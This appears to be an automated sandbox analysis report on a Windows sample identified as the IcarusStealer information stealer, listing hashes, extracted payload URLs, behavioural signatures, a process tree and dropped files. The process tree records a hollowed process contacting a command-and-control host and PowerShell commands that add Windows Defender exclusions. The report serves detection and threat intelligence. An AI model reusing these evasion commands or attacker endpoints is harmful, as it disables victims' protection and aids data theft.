Analysis

  • max time kernel
    127s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08/03/2024, 01:45

General

  • Target

    switched_1.exe

  • Size

    3.7MB

  • MD5

    b9bbe31d276de5c3d05352d070ae4244

  • SHA1

    5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

  • SHA256

    a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

  • SHA512

    0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

  • SSDEEP

    49152:tYDJ4w53qs7fg442ZvkOlVdP8iFoh/dYINv7sq8:e4u3cV/gHP8X1hNv7

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\switched_1.exe
    "C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
      "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2548
        • C:\Windows\system32\certutil.exe
          certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
          4⤵
            PID:2652
          • C:\Windows\system32\find.exe
            find /i /v "md5"
            4⤵
              PID:2552
            • C:\Windows\system32\find.exe
              find /i /v "certutil"
              4⤵
                PID:2424
          • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
            "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2584
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1660
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP"
                4⤵
                  PID:2616
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                3⤵
                • Modifies Installed Components in the registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:2400
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  4⤵
                    PID:292
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                  3⤵
                    PID:2408
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                    3⤵
                      PID:2432
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2464
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                        4⤵
                          PID:2688
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1724
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1548
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1924

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp

                    Filesize

                    1KB

                    MD5

                    b1ae4127bcb50359b0edcc52e0025e95

                    SHA1

                    f87259f40ae67a73f2dee61851f89c153ba7113f

                    SHA256

                    1a067edecd3154053c742ed3cf341934a27f06f1918c3ac4011c4b6bc42f3b56

                    SHA512

                    4a1731ef205fae7545c126ca0b86654f531a52ca4a192ec3655b19f68a91ccaf0fd500306624b1525110777e48653d40fc9eecf636cc805f8f493c9aa586b805

                  • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

                    Filesize

                    1.9MB

                    MD5

                    e1f9a012841d02b6b01843c5c84a09f8

                    SHA1

                    857b63a05ba1b02d129eeb91efa7e3d8a6475958

                    SHA256

                    364a5b9255a40c5a8ba431d79abf37df8b278621f67fde99e054e16453d0cef7

                    SHA512

                    7571a3462239f31e206d652f69ae3edd89219023196bff7d55bb76217d2dfcb3b1e77061f4c0a4f9ab392ec3d6a2f778467128d7d0dcc26e76b1578d8b5d0c44

                  • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

                    Filesize

                    2.4MB

                    MD5

                    beecd7735af8503be2d5abdd0a1639a7

                    SHA1

                    93e53ce680eaa4cd54a9dfbd65cbe5abc3174d5b

                    SHA256

                    e9c02b026697752d8fa535c5586bd7f4abaa899b5e5e2ec7840b8bfae38722b7

                    SHA512

                    bc3787b31e6d8dc600245eee203256b9ca9800f21fab41f7d30542740728bb59218abe5e6ec3ec8469c855c0a963790f638ea2e2694024f4d57de3306a4070a0

                  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP

                    Filesize

                    1KB

                    MD5

                    e9144225655a1177485a6238f397718e

                    SHA1

                    0618d989814312c38b8005fc469222f891470642

                    SHA256

                    f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d

                    SHA512

                    392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

                  • \??\c:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.0.cs

                    Filesize

                    1KB

                    MD5

                    14846c9faaef9299a1bf17730f20e4e6

                    SHA1

                    8083da995cfaa0e8e469780e32fcff1747850eb6

                    SHA256

                    61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                    SHA512

                    549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                  • \??\c:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline

                    Filesize

                    448B

                    MD5

                    cb9c6bc36d404c58941fbaaafbec7eb6

                    SHA1

                    8138f58b9f3e2b304e8ef6b24f9c43447e1fcc26

                    SHA256

                    d342d9f407faa217db5dbb348bf947d91a5f073427884e4230e62d0c2eded14f

                    SHA512

                    4cd91754cf19da7795fc5b72c5e2757f6f54378c1b9731185c14f4948ae56e2c0f8b2d0b451bd857990b6b25e05f585dc47cac81ba55686fec80d28cd5ceaf7b

                  • \Users\Admin\AppData\Local\Temp\pulse x loader.exe

                    Filesize

                    2.6MB

                    MD5

                    93d03553eea24aba513c5ebd4432644d

                    SHA1

                    6f7f0b651a7c0e2775cb161edf10b0459e172a9f

                    SHA256

                    23e9fa0b264edcf4ecae8b0753752a529a03515fecec3b9502d3dbe40f773065

                    SHA512

                    032b9baa882bcfc4c4dd66fda52d083e6b69ee56f02bc5b9f1af74d7ae206d8e2656874e01ab71ee7ad178afb304e8924d9e43b948ee722db7e6d27e679dae4c

                  • \Users\Admin\AppData\Local\Temp\tesetey.exe

                    Filesize

                    494KB

                    MD5

                    0f0838bc6642dd6bc603368e50b4aba3

                    SHA1

                    932bd4d1c11996bf8ac3ac74a94b266e96d44c36

                    SHA256

                    4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

                    SHA512

                    a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

                  • memory/1724-55-0x0000000002A90000-0x0000000002AD0000-memory.dmp

                    Filesize

                    256KB

                  • memory/1724-49-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1724-59-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1724-57-0x0000000002A90000-0x0000000002AD0000-memory.dmp

                    Filesize

                    256KB

                  • memory/1724-53-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1724-51-0x0000000002A90000-0x0000000002AD0000-memory.dmp

                    Filesize

                    256KB

                  • memory/1924-58-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1924-56-0x00000000004B0000-0x00000000004F0000-memory.dmp

                    Filesize

                    256KB

                  • memory/1924-54-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1924-50-0x000000006EFD0000-0x000000006F57B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1924-52-0x00000000004B0000-0x00000000004F0000-memory.dmp

                    Filesize

                    256KB

                  • memory/2400-72-0x0000000002A70000-0x0000000002A80000-memory.dmp

                    Filesize

                    64KB

                  • memory/2400-68-0x0000000004240000-0x0000000004241000-memory.dmp

                    Filesize

                    4KB

                  • memory/2400-64-0x0000000004240000-0x0000000004241000-memory.dmp

                    Filesize

                    4KB

                  • memory/2464-43-0x0000000000340000-0x0000000000380000-memory.dmp

                    Filesize

                    256KB

                  • memory/2464-39-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-37-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-41-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-35-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-30-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-32-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-42-0x00000000741D0000-0x00000000748BE000-memory.dmp

                    Filesize

                    6.9MB

                  • memory/2464-34-0x0000000000400000-0x0000000000424000-memory.dmp

                    Filesize

                    144KB

                  • memory/2464-36-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                    Filesize

                    4KB

                  • memory/2464-67-0x0000000000340000-0x0000000000380000-memory.dmp

                    Filesize

                    256KB

                  • memory/2464-66-0x00000000741D0000-0x00000000748BE000-memory.dmp

                    Filesize

                    6.9MB

                  • memory/2584-15-0x00000000011D0000-0x0000000001252000-memory.dmp

                    Filesize

                    520KB

                  • memory/2584-62-0x00000000741D0000-0x00000000748BE000-memory.dmp

                    Filesize

                    6.9MB

                  • memory/2584-17-0x0000000000D80000-0x0000000000DC0000-memory.dmp

                    Filesize

                    256KB

                  • memory/2584-16-0x00000000741D0000-0x00000000748BE000-memory.dmp

                    Filesize

                    6.9MB

                  • memory/2660-65-0x00000000035A0000-0x00000000039DC000-memory.dmp

                    Filesize

                    4.2MB

                  • memory/2660-7-0x00000000035A0000-0x00000000039DC000-memory.dmp

                    Filesize

                    4.2MB

                  • memory/2964-63-0x000000013F760000-0x000000013FB9C000-memory.dmp

                    Filesize

                    4.2MB

                  • memory/2964-12-0x000000013F760000-0x000000013FB9C000-memory.dmp

                    Filesize

                    4.2MB